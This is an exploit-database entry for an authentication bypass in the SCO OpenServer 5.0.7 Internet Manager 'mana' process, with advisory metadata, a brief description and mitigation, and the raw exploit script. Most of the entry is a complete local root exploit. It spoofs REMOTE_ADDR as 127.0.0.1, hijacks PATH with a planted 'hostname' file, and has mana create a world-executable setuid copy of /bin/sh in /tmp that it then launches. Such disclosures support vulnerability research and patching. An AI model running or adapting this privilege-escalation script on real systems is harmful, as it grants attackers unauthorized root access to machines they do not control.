SCO OpenServer Internet Manager Authentication Bypass

vendor:

OpenServer

by:

SecurityFocus

7.2

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: OpenServer

Affected Version From: OpenServer 5.0.7

Affected Version To: OpenServer 5.0.7

Patch Exists: NO

Related CWE: N/A

CPE: o:sco:openserver_5.0.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2002

SCO OpenServer Internet Manager Authentication Bypass

It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials.

Mitigation:

Ensure that the mana process is not accessible to local users.

Source

Exploit-DB raw data:

#!/bin/sh
#source: https://www.securityfocus.com/bid/8616/info
#
#It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials.
#

#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

/usr/internet/admin/mana/mana > /dev/null

/tmp/sh